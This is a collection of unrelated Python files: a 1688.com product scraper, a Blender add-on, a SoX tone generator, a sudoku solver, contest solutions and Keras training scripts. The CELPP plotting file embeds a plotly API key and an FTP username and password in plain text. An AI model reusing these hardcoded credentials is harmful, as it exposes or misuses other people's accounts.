PRODUCT_RE = re.compile(r'<a href="http://detail.1688.com/offer/([^\.]+)[^>]+>\s+<img src="[^"]+" alt="[^"]+"\s+/>', re.S)
DETAIL_RE = re.compile(r'<script>window\.wingxViewData=window\.wingxViewData\|\|\{\};window\.wingxViewData\[0\]=(.+?)(?=</script></div></div>)', re.S)
def fetch_offer_list(self):
config = self.db.query(model.ConfigModel).first()
list_index_url = self.LIST_INDEX_URL.format(shop_name=config.shop_name)
while 1:
try:
list_page = requests.get(list_index_url).text
if list_page: break
except:
print('Fetch offer list error!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
traceback.print_exc()
pages = int(self.MAX_PAGE_RE.search(list_page).group(1))
for page in range(1, pages+1):
print('第%d页' % page)
list_page = requests.get(self.LIST_URL.format(shop_name=config.shop_name, page=page)).text
for product_search in self.PRODUCT_RE.finditer(list_page):
yield product_search.group(1)
def fetch_offer_dict(self, offer_id):
while 1:
try:
product_page = requests.get(self.PRODUCT_URL.format(offer_id=offer_id)).text
detail_search = self.DETAIL_RE.search(product_page)
data = json.loads(detail_search.group(1))
data['begin']=max([int(item[0]) for item in data['skuPriceRanges']]) if data['skuPriceRanges'] else None
if data.get('priceDisplay') != None:
data['priceDisplay'] = float(data.get('priceDisplay').split('-')[0])
data['productFeatureList'] = dict(((i['name'], i['value']) for i in data['productFeatureList']))
if data['productFeatureList'].get('主面料成分的含量') != None:
data['productFeatureList']['主面料成分的含量'] = float(data['productFeatureList']['主面料成分的含量'])
temp = []
for name in data['skuMap'] or []:
item = data['skuMap'][name]
item.update(zip(['color', 'size'], name.split('>')))
for key, data_type in (('canBookCount', int), ('discountPrice', float), ('saleCount', int)):
if key in item and item[key] != None:
item[key] = data_type(item[key])
temp.append(item)
data['skuMap'] = temp
if data: break
except:
print('Fetch offer dict error!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
traceback.print_exc()
return data
def thumb(self, url, size=100):
""" 返回缩略图地址."""
url_split = url.rsplit('.', 1)
url_split.insert(1, '%dx%d' % (size, size))
return '.'.join(url_split)
def save_img(self, url, filename):
target = os.path.join(os.getcwd(), 'media/img/product', filename+'.jpg')
content = requests.get(url).content
with open(target, 'wb') as f:
f.write(content)
return '/media/img/product/' + filename + '.jpg'
|
import math
def tree_height(degrees, distance):
""" Returns the height of a tree given a distance from its base
and a measured angle to its top."""
radians = degrees * math.pi / 180
height = distance * math.tan(radians)
return height
# Data are in the form: ID of individual, distance (m) and angle (degrees)
trees = [ ('A', 31.66, 41.28),
('B', 45.98, 44.53),
('C', 31.24, 25.14),
('D', 34.61, 23.33),
('E', 45.46, 38.34),
('F', 48.79, 33.59),
('H', 30.64, 29.66),
]
tree_height(trees)
# For each individual, print its ID and height
|
from FileTransfer import FtpFileTransfer
import os
import shutil
import prody
import plotly as py
import pandas as pd
import numpy as np
import seaborn as sns
import plotly.plotly as py
import plotly.tools as plotly_tools
import plotly.graph_objs as go
import plotly.offline as offline
import os
import matplotlib.pyplot as plt
import matplotlib as mpl
%matplotlib inline
from scipy.stats import gaussian_kde
from IPython.display import HTML
py.sign_in("juz19", "gns0PM7FQ368i6A8tNOZ")
def fetch_visual_file():
global wd
wd = str(os.getcwd())
print('All Files will go into the celpp folder')
cred = (wd + '/credentials.txt')
try: #attempts to connect to file required to connect to ftp
print('Trying to open credentials.txt')
fo = open(cred, 'r')
fo.close()
except: #writes file required to connect to ftp if not already made
print('Writing credentials.txt file')
fo = open(cred, 'w')
fo.write('host ftp.box.com\nuser nlr23@pitt.edu\npass #hail2pitt1\npath\ncontestantid 33824\nchallengepath /challengedata\nsubmissionpath /33824')
fo.close()
if(os.path.isdir(wd + '/challengedata_Visualizaiton')==False):#creates challengedata folder if it doesn't exist
print('challengedata_Visualizaiton directory does not exists. ')
os.mkdir(wd + '/challengedata_Visualizaiton')
os.chdir(wd + '/challengedata_Visualizaiton')
else: #changes to challengedata folder if it exists
os.chdir(wd + '/challengedata_Visualizaiton')
ftp = FtpFileTransfer(cred)
print('Connecting to ftp.box.com')
ftp.connect()
print('Connected to ftp')
ftp_files = ftp.list_files('challengedata')#creates list of files from box
for x in (ftp_files):
if (x == 'visual.txt'):
ftp.download_file('challengedata/' + x, wd + '/challengedata/' + x)
ftp.disconnect()
print('Disconnected from ftp')
def box_plot(rmsd, week_num):
x_data = list(rmsd.keys())
y_data = []
for x in x_data:
data = rmsd.get(x)
y_data.append(data)
y_best_rmsd = []
y_first_rmsd = []
for y in y_data:
min_rmsd = min(y)
first_rmsd = y[0]
y_best_rmsd.append(min_rmsd)
y_first_rmsd.append(first_rmsd)
N = len(x_data)
colors = ['hsl('+str(h)+',50%'+',50%)' for h in np.linspace(0, 360, N)]
traces = []
for xd, yd, ybest, yfirst, cls in zip(x_data, y_data, y_best_rmsd, y_first_rmsd, colors):
traces.append(go.Box(
y=yd,
name=xd,
boxpoints='all',
jitter=1,
whiskerwidth=1,
pointpos = -2,
fillcolor=cls,
marker=dict(size=3,),
line=dict(width=1.5),))
traces.append(go.Scatter(
showlegend = True,
legendgroup = 'Best RMSD',
y = ybest,
x = xd,
name = xd + ' Best RMSD',
fillcolor=cls,
marker = dict(size = 15, symbol = 'square-open', ), ))
traces.append(go.Scatter(
showlegend = True,
legendgroup = 'First Pose RMSD',
y = yfirst,
x = xd,
name = xd + ' First Pose RMSD',
fillcolor = cls,
marker = dict(size = 15, symbol = 'star', ),))
layout = go.Layout(title='RMSD for all Targets in Week' + str(week_num),
yaxis=dict(autorange=True,showgrid=True,zeroline=True,dtick=5,
gridcolor='rgb(255, 255, 255)', gridwidth=1,
zerolinecolor='rgb(255, 255, 255)',zerolinewidth=2,),
margin=dict(l=40,r=30,b=80,t=100,),
paper_bgcolor='rgb(243, 243, 243)',
plot_bgcolor='rgb(243, 243, 243)',
showlegend=False)
fig = go.Figure(data=traces, layout=layout)
return fig
def bar_plot(rmsd, week_num):
x_data = list(rmsd.keys())
y_data = []
for x in x_data:
data = rmsd.get(x)
y_data.append(data)
y_best_rmsd = []
y_first_rmsd = []
for y in y_data:
min_rmsd = min(y)
first_rmsd = y[0]
y_best_rmsd.append(min_rmsd)
y_first_rmsd.append(first_rmsd)
trace1 = go.Bar(
x = x_data,
y = y_best_rmsd,
name='Best RMSD'
)
trace2 = go.Bar(
x = x_data,
y = y_first_rmsd,
name='First Pose RMSD'
)
data = [trace1, trace2]
layout = go.Layout(title='Best and First Pose RMSD for all Targets in Week' + str(week_num),
barmode='group'
)
fig = go.Figure(data=data, layout=layout)
return fig
|
import os
import bpy
from bpy.props import BoolProperty
from photogrammetry_importer.blender_logging import log_report
from photogrammetry_importer.camera_import_properties import CameraImportProperties
from photogrammetry_importer.point_import_properties import PointImportProperties
from photogrammetry_importer.mesh_import_properties import MeshImportProperties
from photogrammetry_importer.registration import register_importers
from photogrammetry_importer.registration import unregister_importers
from photogrammetry_importer.registration import register_exporters
from photogrammetry_importer.registration import unregister_exporters
def get_addon_name():
return __name__.split('.')[0]
class PhotogrammetryImporterPreferences(bpy.types.AddonPreferences,
CameraImportProperties,
PointImportProperties,
MeshImportProperties):
# __name__ == photogrammetry_importer.preferences.addon_preferences
bl_idname = get_addon_name()
# Importer
colmap_importer_bool: BoolProperty(
name="Colmap Importer",
default=True)
meshroom_importer_bool: BoolProperty(
name="Meshroom Importer",
default=True)
open3d_importer_bool: BoolProperty(
name="Open3D Importer",
default=True)
opensfm_importer_bool: BoolProperty(
name="OpenSfM Importer",
default=True)
openmvg_importer_bool: BoolProperty(
name="OpenMVG Importer",
default=True)
ply_importer_bool: BoolProperty(
name="PLY Importer",
default=True)
visualsfm_importer_bool: BoolProperty(
name="VisualSfM Importer",
default=True)
# Exporter
colmap_exporter_bool: BoolProperty(
name="Colmap Exporter",
default=True)
visualsfm_exporter_bool: BoolProperty(
name="VisualSfM Exporter",
default=True)
def draw(self, context):
layout = self.layout
importer_exporter_box = layout.box()
importer_exporter_box.label(
text='Active Importers / Exporters:')
split = importer_exporter_box.split()
column = split.column()
importer_box = column.box()
importer_box.prop(self, "colmap_importer_bool")
importer_box.prop(self, "meshroom_importer_bool")
importer_box.prop(self, "open3d_importer_bool")
importer_box.prop(self, "opensfm_importer_bool")
importer_box.prop(self, "openmvg_importer_bool")
importer_box.prop(self, "ply_importer_bool")
importer_box.prop(self, "visualsfm_importer_bool")
column = split.column()
exporter_box = column.box()
exporter_box.prop(self, "colmap_exporter_bool")
exporter_box.prop(self, "visualsfm_exporter_bool")
importer_exporter_box.operator("photogrammetry_importer.update_importers_and_exporters")
import_options_box = layout.box()
import_options_box.label(text='Default Import Options:')
self.draw_camera_options(import_options_box, draw_everything=True)
self.draw_point_options(import_options_box, draw_everything=True)
self.draw_mesh_options(import_options_box)
class UpdateImportersAndExporters(bpy.types.Operator):
bl_idname = "photogrammetry_importer.update_importers_and_exporters"
bl_label = "Update (Enable / Disable) Importers and Exporters"
@classmethod
def poll(cls, context):
return True
def execute(self, context):
log_report('INFO', 'Update importers and exporters: ...', self)
addon_name = get_addon_name()
import_export_prefs = bpy.context.preferences.addons[addon_name].preferences
unregister_importers()
register_importers(import_export_prefs)
unregister_exporters()
register_exporters(import_export_prefs)
log_report('INFO', 'Update importers and exporters: Done', self)
return {'FINISHED'}
|
def sum_of_n(n):
return [x*(x+1)/2 if n>=0 else x*(x+1)/-2 for x in range(abs(n)+1)]
'''
Sum of 'n' Numbers
A sequence or a series, in mathematics, is a string of objects, like numbers, that follow a particular pattern. The individual elements in a sequence are called terms.
For example, some simple patterns include: 3, 6, 9, 12, 15, 18, 21, ...
Pattern: "add 3 to the previous number to get the next number"
0, 12, 24, 36, 48, 60, 72, ...
Pattern: "add 12 to the previous number to get the next number"
How about generating a more complicated pattern?
0, 1, 3, 6, 10, 15, 21, 28, ...
0(0)_
,1
(0+1)
,3
(0+1+2)
,6
(0+1+2+3)_...
Pattern: "thenth term is the sum of numbers(from 0 ton, inclusive)"
sum_of_n (or SequenceSum.sumOfN in Java, SequenceSum.SumOfN in C#) takes an integer n and returns a List (an Array in Java/C#) of length abs(n) + 1. The List/Array contains the numbers in the arithmetic series produced by taking the sum of the consecutive integer numbers from 0 to n inclusive.
n can also be 0 or a negative value.
Wikipedia reference for abs value is available here.
Example:
5 -> [0, 1, 3, 6, 10, 15]
-5 -> [0, -1, -3, -6, -10, -15]
7 -> [0, 1, 3, 6, 10, 15, 21, 28]
'''
|
#!/bin/env python
import parmed as pmd
import sys
lib, res_old, res_new = sys.argv[1:]
res = pmd.load_file(lib)[res_old]
res.name = res_new
res.save(res_new + '.lib')
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Nov 2 17:56:23 2020
@author: ali
"""
import sys
import argparse
import platform
import numpy as np
import os
OSplatform= platform.system()
def singlefrequencygenerator():
'''
Gets Frequency and duration from user and plays the frequency for the duration.
Returns
-------
None.
'''
frequency = float(input('Please enter the frequency:\n>>> '))
duration = float(input('Please enter the duration of the played frequency (in seconds):\n>>> '))
duration *=1000
if OSplatform == 'Darwin':
# First install Homebrew (https://brew.sh/)
# and then SoX using 'brew install sox' in the terminal
import os
try:
os.system('play -n synth %s sin %s' % (duration/1000, frequency))
except:
print("This feature uses the SoX software package. \nPlease install Homebrew (https://brew.sh/),\n then install SoX using 'brew install sox' in the terminal")
exit()
elif OSplatform == 'Windows':
import winsound
winsound.Beep(frequency, duration)
elif OSplatform == 'Linux':
#
import os
try:
os.system('play -n synth %s sin %s' % (duration/1000, frequency))
except:
print("This feature uses the SoX software package. \nSoX can be installed using 'sudo apt-get install sox' in the terminal")
exit()
def multifrequencygenerator():
'''
Gets Frequency range and duration from user and plays the frequencies for the duration.
Returns
-------
None.
'''
frequency = input('Please enter the frequency range. example: 2 400 \n>>> ').split()
duration = float(input('Please enter the duration of the played frequency (in seconds):\n>>> '))
duration *=1000
freqbegin=float(frequency[0])
freqend =float(frequency[1])
if OSplatform == 'Darwin':
try:
os.system('play -n synth %s sin %s+%s' % (duration/(1000), freqbegin, freqend))
except:
print("This feature uses the SoX software package. \nPlease install Homebrew (https://brew.sh/),\n then install SoX using 'brew install sox' in the terminal")
exit()
elif OSplatform == 'Windows':
import winsound
winsound.Beep(freqbegin, duration)
elif OSplatform == 'Linux':
try:
os.system('play -n synth %s sin %s+%s' % (duration/1000, freqbegin, freqend))
except:
print("This feature uses the SoX software package. \nSoX can be installed using 'sudo apt-get install sox' in the terminal")
exit()
def recordmic():
if OSplatform == 'Darwin':
try:
# os.system('timeout 5 sox -b 32 -e unsigned-integer -r 96k -c 2 -d --clobber --buffer $((96000*2*10)) /tmp/soxrecording.wav')
os.system('rec -c 2 testsox.wav trim 0 5')
except:
print("This feature uses the SoX software package. \nPlease install Homebrew (https://brew.sh/),\n then install SoX using 'brew install sox' in the terminal")
exit()
# elif OSplatform == 'Windows':
# import winsound
# winsound.Beep(freqbegin, duration)
elif OSplatform == 'Linux':
try:
os.system('timeout 5 sox -b 32 -e unsigned-integer -r 96k -c 2 -d --clobber --buffer $((96000*2*10)) /tmp/soxrecording.wav')
except:
print("This feature uses the SoX software package. \nSoX can be installed using 'sudo apt-get install sox' in the terminal")
exit()
def record(time):
if OSplatform == 'Darwin':
try:
# os.system('timeout 5 sox -b 32 -e unsigned-integer -r 96k -c 2 -d --clobber --buffer $((96000*2*10)) /tmp/soxrecording.wav')
os.system('rec -c 2 testsox.wav trim 0 {}'.format(time))
except:
print("This feature uses the SoX software package. \nPlease install Homebrew (https://brew.sh/),\n then install SoX using 'brew install sox' in the terminal")
exit()
# elif OSplatform == 'Windows':
# import winsound
# winsound.Beep(freqbegin, duration)
elif OSplatform == 'Linux':
try:
os.system('rec -c 2 testsox.wav trim 0 {}'.format(time))
except:
print("This feature uses the SoX software package. \nSoX can be installed using 'sudo apt-get install sox' in the terminal")
exit()
def playback():
if OSplatform == 'Darwin':
try:
# os.system('timeout 5 sox -b 32 -e unsigned-integer -r 96k -c 2 -d --clobber --buffer $((96000*2*10)) /tmp/soxrecording.wav')
os.system('play testsox.wav')
except:
print("This feature uses the SoX software package. \nPlease install Homebrew (https://brew.sh/),\n then install SoX using 'brew install sox' in the terminal")
exit()
# elif OSplatform == 'Windows':
# import winsound
# winsound.Beep(freqbegin, duration)
elif OSplatform == 'Linux':
try:
os.system('play testsox.wav')
except:
print("This feature uses the SoX software package. \nSoX can be installed using 'sudo apt-get install sox' in the terminal")
exit()
def echomode():
print('\nRecord for t seconds. Then hear the playback')
time =input('\nPlease set t. \nIf this is your first time, try 5 seconds >>> ')
status=True
input('Press enter to start.')
while(status):
record(time)
playback()
keyin = input('Press enter to start again or q to exit >>> ')
if keyin=='q':
status=False
os.system('rm testsox.wav')
def argparser():
parser = argparse.ArgumentParser(description='Frequency generator')
parser = argparse.ArgumentParser()
parser.add_argument('--mode', type=str, required=True,
help="Set frequency generator mode: 'S' single, 'R' Ranged frequency mode.")
return parser.parse_args()
args =argparser()
if args.mode == 'S':
singlefrequencygenerator()
elif args.mode == 'R':
multifrequencygenerator()
elif args.mode == 'E':
echomode()
else:
print('{}: No such option. Please run "{} -h" for a list of available options.'.format(args.mode,sys.argv[0]))
exit() |
import sys
import os
sys.path.insert(0,os.path.abspath(os.path.join(os.path.dirname(__file__),'..')))
import doggy
import ds
|
__author__ = "Narwhale"
def insert_sort(alist):
"""插入排序"""
n = len(alist)
for j in range(1,n):
for i in range(j,0,-1):
if alist[i-1] > alist[i]:
alist[i-1],alist[i] = alist[i],alist[i-1]
li = [54,26,93,17,77,31,44,55,20]
insert_sort(li)
print(li)
|
# 数据范围很小,肯定是暴力枚举 + 位元算
# 聊天去了,没时间做(
# 指路 1879
# 三进制来表示篮子的状态
class Solution:
def maximumANDSum(self, nums: List[int], numSlots: int) -> int:
@lru_cache(None)
def dfs(cur,index):
if index == len(nums):
return 0
ans = 0
for i in range(numSlots):
tar = cur // (3 ** i) % 3
if tar < 2:
ans = max(ans,((i + 1) & nums[index]) + dfs(cur + 3 ** i,index + 1))
return ans
return dfs(0,0)
class Solution:
def maximumANDSum(self, nums: List[int], numSlots: int) -> int:
ans, n = 0, len(nums)
f = [0] * (1 << (numSlots * 2))
for i, fi in enumerate(f):
c = i.bit_count()
if c >= n:
continue
for j in range(numSlots * 2):
if (i & (1 << j)) == 0:
s = i | (1 << j)
f[s] = max(f[s], fi + ((j // 2 + 1) & nums[c]))
ans = max(ans, f[s])
return ans
# 最大权二分图匹配
import numpy as np
from scipy.optimize import linear_sum_assignment
class Solution:
def maximumANDSum(self, nums: List[int], ns: int) -> int:
nums, slots, mx = nums + [0] * (2 * ns - len(nums)), [*range(1, ns + 1)] * 2, np.zeros((ns * 2, ns * 2))
for (i, x), (j, sn) in product(enumerate(nums), enumerate(slots)): mx[i, j] = x & sn
return int(mx[linear_sum_assignment(-mx)].sum())
|
import pew # setting up tools for the pewpew
import random
from microqiskit import QuantumCircuit, simulate # setting up tools for quantum
pew.init() # initialize the game engine...
screen = pew.Pix() # ...and the screen
qc = QuantumCircuit(2,2) # create an empty circuit with two qubits and two output bits
qc.h(0)
qc.cx(0,1)
# create circuits with the required measurements, so we can add them in easily
meas = QuantumCircuit(2,2)
meas.measure(0,0)
meas.measure(1,1)
# loop over the squares centered on (1,2), (6,2) (1,4) and (6,4) and make all dim
for (X,Y) in [(1,4),(6,4)]:
for dX in [+1,0,-1]:
for dY in [+1,0,-1]:
screen.pixel(X+dX,Y+dY,2)
pew.show(screen)
for (X,Y) in [(1,4),(6,4)]:
screen.pixel(X,Y,0) # turn off the center pixels of the squares
old_keys = 0
while True: # loop which checks for user input and responds
# look for and act upon key presses
keys = pew.keys() # get current key presses
if keys!=0 and keys!=old_keys:
if keys&pew.K_O:
qc.cx(1,0)
old_keys = keys
# execute the circuit and get a single sample of memory for the given measurement bases
m = simulate(qc+meas,shots=1,get='memory')
# turn the pixels (1,2) and (1,4) (depending on basis[1]) on or off (depending on m[0][0])
if m[0][0]=='1':
screen.pixel(6,4,3)
else:
screen.pixel(6,4,0)
# do the same for pixels (6,2) and (6,4)
if m[0][1]=='1':
screen.pixel(1,4,3)
else:
screen.pixel(1,4,0)
# turn the pixels not used to display m[0] to dim
pew.show(screen)
pew.tick(1/6) # pause for a sixth of a second |
# JTSK-350112
# pickling.py
# Taiyr Begeyev
# t.begeyev@jacobs-university.de
import sys
import pickle
from student import *
# create a student object with some properties
s1 = Student("Elon", 2)
s1.setScore(1, 100)
s1.setScore(2, 100)
# print the object and the size of it in bytes
print(s1)
print("Size = {}".format(sys.getsizeof(s1)))
# open file
try:
file = open("object.txt", "wb")
except:
sys.exit("Couldn't open the file")
# pickle the object
pickle.dump(s1, file)
# close the file
file.close() |
x=input("Digite 1° Cateto:")
y=input("Digite 2° Cateto:")
hip=input("Digite Hipotenusa:")
if hip == '':
hip = (float(x)**2 +float(y)**2)**(1/2)
print(hip)
elif x == '':
x = (((-1*(float(hip)**2))+(float(y)**2))**(1/2))
print(x)
elif y == '':
y = (((-1 * (float(hip) ** 2)) + (float(x) ** 2)) ** (1 / 2))
print(y)
u=input() |
'''
Basic Sudoku Solver using Backtracking
'''
from datetime import datetime
def print_board(arr):
for i in range(9):
for j in range(9):
print(arr[i][j], end = ' ')
print('')
def find_empty(arr, tmp):
for row in range(9):
for col in range(9):
if arr[row][col] == 0:
tmp[0] = row
tmp[1] = col
return True
return False
def is_inrow(arr, row, num):
for col in range(9):
if arr[row][col] == num:
return True
return False
def is_incol(arr, col, num):
for row in range(9):
if arr[row][col] == num:
return True
return False
def is_inbox(arr, row, col, num):
nx = (row // 3)*3
ny = (col // 3)*3
for i in range(nx, nx+3):
for j in range(ny, ny+3):
if arr[i][j] == num:
return True
return False
def is_safe(arr , row, col, num):
return not is_inrow(arr, row, num) and not is_incol(arr, col, num) and not is_inbox(arr, row, col, num)
def solver(arr):
tmp = [0,0]
if not find_empty(arr, tmp):
return True
row = tmp[0]
col = tmp[1]
for i in range(1,10):
if is_safe(arr, row, col, i):
arr[row][col] = i
if solver(arr):
return True
arr[row][col] = 0
return False
if __name__=="__main__":
# assigning values to the grid
input =[[3, 0, 6, 5, 0, 8, 4, 0, 0],
[5, 2, 0, 0, 0, 0, 0, 0, 0],
[0, 8, 7, 0, 0, 0, 0, 3, 1],
[0, 0, 3, 0, 1, 0, 0, 8, 0],
[9, 0, 0, 8, 6, 3, 0, 0, 5],
[0, 5, 0, 0, 9, 0, 6, 0, 0],
[1, 3, 0, 0, 0, 0, 2, 5, 0],
[0, 0, 0, 0, 0, 0, 0, 7, 4],
[0, 0, 5, 2, 0, 6, 3, 0, 0]]
# datetime module to measure run time
start = datetime.now().microsecond
# if success print the grid
if(solver(input)):
print_board(input)
else:
print("No solution exists")
print((datetime.now().microsecond-start)) |
from keg_storage import Storage
storage = Storage()
|
"""
Dieses Programm trainiert das neuronale Netz.
Dafür werden die Daten aus dem "dataset"-Verzeichnis verwendet.
Verwendung: 'python3 train-netzwerk.py'
(am besten zusamen mit 'nice' ausführen, da das Training lange
dauert und sehr rechenintensiv ist)
"""
import sys
import os
import numpy as np
from keras.applications.inception_resnet_v2 import InceptionResNetV2, preprocess_input
from keras.models import Model
from keras.layers.convolutional import Conv2D, MaxPooling2D
from keras.layers import Dropout, Flatten, Dense, Activation, GlobalAveragePooling2D
from keras import callbacks
from keras import optimizers
from keras.preprocessing.image import ImageDataGenerator
np.random.seed(42)
DEV = False
argvs = sys.argv
argc = len(argvs)
if argc > 1 and (argvs[1] == "--development" or argvs[1] == "-d"):
DEV = True
if DEV:
epochs = 2
else:
epochs = 20
train_data_path = './data/train'
validation_data_path = './data/validation'
"""
Parameters
"""
img_width, img_height = 299, 299
input_shape = (img_width, img_height, 3)
batch_size = 32
samples_per_epoch = 2000
validation_samples = 235
filters1 = 32
filters2 = 64
conv1_size = 3
conv2_size = 2
pool_size = 2
classes_num = 3
lr = 0.0004
base_model = InceptionResNetV2(include_top=False, input_shape=(299,299,3), weights='imagenet')
for layer in base_model.layers:
layer.trainable = False
x = base_model.output
x = GlobalAveragePooling2D(name='avg_pool')(base_model.output)
x = Dense(classes_num, activation='softmax')(x)
model = Model(inputs=base_model.input, outputs=x)
model.compile(loss = 'categorical_crossentropy',
optimizer = optimizers.Adam(lr=1e-3),
metrics = ['acc'])
train_datagen = ImageDataGenerator(
preprocessing_function=preprocess_input,
rotation_range=40,
width_shift_range=0.2,
height_shift_range=0.2,
shear_range=0.2,
zoom_range=0.2,
channel_shift_range=10,
horizontal_flip=True,
fill_mode='nearest')
train_generator = train_datagen.flow_from_directory(
train_data_path,
target_size=(img_height, img_width),
interpolation='bicubic',
class_mode='categorical',
shuffle=True,
batch_size=batch_size)
validation_datagen = ImageDataGenerator(
preprocessing_function=preprocess_input)
validation_generator = validation_datagen.flow_from_directory(
validation_data_path,
target_size=(img_height, img_width),
interpolation='bicubic',
class_mode='categorical',
shuffle=False,
batch_size=batch_size)
"""
Tensorboard log
"""
log_dir = './tf-log/'
tb_cb = callbacks.TensorBoard(log_dir=log_dir, histogram_freq=0)
cbks = [tb_cb]
model.fit_generator(
train_generator,
steps_per_epoch = samples_per_epoch // batch_size,
epochs = epochs,
verbose = 1,
workers = 1,
use_multiprocessing = False,
validation_data = validation_generator,
callbacks = cbks,
validation_steps = validation_samples // batch_size)
target_dir = './models/'
if not os.path.exists(target_dir):
os.mkdir(target_dir)
model.save('./models/model.h5')
model.save_weights('./models/weights.h5')
|
from collections import defaultdict, deque, Counter
from heapq import heapify, heappop, heappush
import math
from copy import deepcopy
from itertools import combinations, permutations, product, combinations_with_replacement
from bisect import bisect_left, bisect_right
import sys
def input():
return sys.stdin.readline().rstrip()
def getN():
return int(input())
def getNM():
return map(int, input().split())
def getList():
return list(map(int, input().split()))
def getArray(intn):
return [int(input()) for i in range(intn)]
mod = 10 ** 9 + 7
MOD = 998244353
sys.setrecursionlimit(1000000)
INF = float('inf')
eps = 10 ** (-10)
dx = [1, 0, -1, 0]
dy = [0, 1, 0, -1]
#############
# Main Code #
#############
from cmath import pi, exp
def _fft(a, h):
root = [exp(2.0j * pi / 2 ** i) for i in range(h + 1)]
for i in range(h):
m = 1 << (h - i - 1)
for j in range(1 << i):
w = 1
j *= 2 * m
for k in range(m):
a[j + k], a[j + k + m] = \
a[j + k] + a[j + k + m], (a[j + k] - a[j + k + m]) * w
w *= root[h - i]
def _ifft(a, h):
iroot = [exp(-2.0j * pi / 2 ** i) for i in range(h + 1)]
for i in range(h):
m = 1 << i
for j in range(1 << (h - i - 1)):
w = 1
j *= 2 * m
for k in range(m):
a[j + k], a[j + k + m] = \
a[j + k] + a[j + k + m] * w, a[j + k] - a[j + k + m] * w
w *= iroot[i + 1]
n = 1 << h
for i in range(n):
a[i] /= n
# 各kについて
# sum([A[i] * B[k - i]])をNlogNで計算する
def fft_convolve(a, b):
n = 1 << (len(a) + len(b) - 1).bit_length()
h = n.bit_length() - 1
a = list(a) + [0] * (n - len(a))
b = list(b) + [0] * (n - len(b))
_fft(a, h), _fft(b, h)
a = [va * vb for va, vb in zip(a, b)]
_ifft(a, h)
return [int(abs(val) + 0.5) for val in a]
# 使い方 codeforces Educational Codeforces Round 108 (Rated for Div. 2)
# D. Maximum Sum of Products
# 配列Aの連続部分列を反転させることができる
# sum(A[0] * B[0] + A[1] * B[1] +...)の最大値を求める
N = getN()
A = getList()
B = getList()
base = [0]
for i in range(N):
base.append(base[-1] + A[i] * B[i])
ans = base[-1]
for i in range(N):
a = [0] + A[i:]
b = [0] + B[i:]
fft = fft_convolve(a, b)
# [i, j]を交換する fftのj + 2を見る
for j in range(N - i):
opt = base[i] + (base[N] - base[i + j + 1]) + fft[j + 2]
ans = max(ans, opt)
print(ans)
|
# -*- coding: utf-8 -*-
# @Time : 2020/3/3 15:31
# @Author : YYLin
# @Email : 854280599@qq.com
# @File : main.py
import os, h5py
import numpy as np
from keras.layers import Lambda, Input
from keras.applications.vgg19 import VGG19
from keras import regularizers
import keras, cv2
from sklearn.model_selection import train_test_split
from keras.models import Model
import warnings, sys
warnings.filterwarnings('ignore')
from keras import optimizers
from keras.datasets import mnist, cifar10
# 定义一些超参
batch_size = 128
img_size = 64
epoch = 10
learn_rate = 0.0001
# 加载数据集 mnist cifar10
dataset = 'mnist'
if dataset == 'mnist':
print('***** loading mnist *****')
(train, train_y), (test, test_y) = mnist.load_data()
train_y = keras.utils.to_categorical(train_y, 10)
test_y = keras.utils.to_categorical(test_y, 10)
# 修改测试集图像的大小
train = [cv2.cvtColor(cv2.resize(i, (img_size, img_size)), cv2.COLOR_GRAY2RGB) for i in train]
train = np.concatenate([arr[np.newaxis] for arr in train]).astype('float32')
test = [cv2.cvtColor(cv2.resize(i, (img_size, img_size)), cv2.COLOR_GRAY2RGB) for i in test]
test = np.concatenate([arr[np.newaxis] for arr in test]).astype('float32')
else:
print('***** loading cifar10 *****')
(train, train_y), (test, test_y) = cifar10.load_data()
train_y = keras.utils.to_categorical(train_y, 10)
test_y = keras.utils.to_categorical(test_y, 10)
# 修改测试集图像的大小
train = [cv2.resize(i, (img_size, img_size)) for i in train]
train = np.concatenate([arr[np.newaxis] for arr in train]).astype('float32')
test = [cv2.resize(i, (img_size, img_size)) for i in test]
test = np.concatenate([arr[np.newaxis] for arr in test]).astype('float32')
print('train, train_y, test, test_y', train.shape, train_y.shape, test.shape, test_y.shape)
# 开始定义自己的训练模型
def gener_fea(model, preprocess=None, name=''):
x = Input((img_size, img_size, 3))
if preprocess:
x = Lambda(preprocess)(x)
base_model = model(input_tensor=x, weights='imagenet', include_top=False, pooling='avg')
train_fea = base_model.predict(train, batch_size=batch_size)
test_fea = base_model.predict(test, batch_size=batch_size)
# 如果文件不存在的话 则将数据写入到模型之中
if os.path.exists("%s_%s.h5" % (name, dataset)):
print("%s_%s.h5" % (name, dataset), '已存在,不执行写操作')
else:
with h5py.File("%s_%s.h5" % (name, dataset), 'w') as f:
print('正在保存数据..%s' % (name))
f.create_dataset('train_fea', data=train_fea)
f.create_dataset('train_y', data=train_y)
f.create_dataset('train', data=train)
f.create_dataset('test_fea', data=test_fea)
f.create_dataset('test_y', data=test_y)
f.create_dataset('test', data=test)
f.close()
return train_fea, test_fea
for_train, for_test = gener_fea(VGG19, name='VGG19')
X_train, X_val, y_train, y_val = train_test_split(for_train, train_y, shuffle=True, test_size=0.2, random_state=2019)
# 对于全连接层使用正则化以及dropout
inputs = Input((512,))
x = inputs
x = keras.layers.Dense(1024, kernel_regularizer=regularizers.l2(0.001), activation='relu')(x)
use_dropout = True # 如果想使用dropout直接设置其为True 不想使用时设置为False
if use_dropout:
x = keras.layers.Dropout(0.5)(x)
y = keras.layers.Dense((10), activation='softmax')(x)
model_1 = Model(inputs=inputs, outputs=y, name='Fusion')
optimi = optimizers.Adam(lr=learn_rate, beta_1=0.9, beta_2=0.95, epsilon=1e-08, decay=0.0)
# 编译模型并保存
model_1.compile(optimizer=optimi, loss='categorical_crossentropy', metrics=['accuracy'])
model_1.fit(x=X_train, y=y_train, batch_size=batch_size, epochs=epoch, validation_data=(X_val, y_val), verbose=1)
model_1.save('model_on_vgg_%s.h5'%dataset)
|
#
# This file is part of LUNA.
#
# Copyright (c) 2020 Great Scott Gadgets <info@greatscottgadgets.com>
# SPDX-License-Identifier: BSD-3-Clause
""" Isochronous Timestamp Packet (ITP)-related gateware. """
from amaranth import *
from usb_protocol.types.superspeed import HeaderPacketType
from ..link.header import HeaderQueue, HeaderPacket
class TimestampPacketReceiver(Elaboratable):
""" Gateware that receives Isochronous Timestamp Packets, and keeps time.
Attributes
----------
header_sink: HeaderQueue(), input stream
Input stream carrying header packets from the link layer.
bus_interval_counter: Signal(14), output
The currently timestamp, expressed in a number of 125uS bus intervals.
